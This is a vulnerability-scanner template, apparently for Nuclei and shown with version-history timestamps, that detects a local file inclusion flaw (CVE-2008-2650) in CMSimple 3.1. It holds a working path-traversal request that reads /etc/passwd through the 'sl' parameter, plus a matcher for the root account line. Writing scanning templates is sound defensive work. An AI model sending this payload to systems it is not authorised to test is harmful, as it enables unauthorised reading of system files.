2021-03-02 07:48:13 +00:00
|
|
|
id: CVE-2008-2650
|
|
|
|
info:
|
|
|
|
name: CMSimple 3.1 - Local File Inclusion
|
|
|
|
author: pussycat0x
|
|
|
|
severity: high
|
|
|
|
reference: https://www.exploit-db.com/exploits/5700
|
|
|
|
tags: cve,cve2008,lfi
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
2021-03-02 08:32:36 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
2021-03-02 07:48:13 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
2021-03-02 08:04:01 +00:00
|
|
|
part: body
|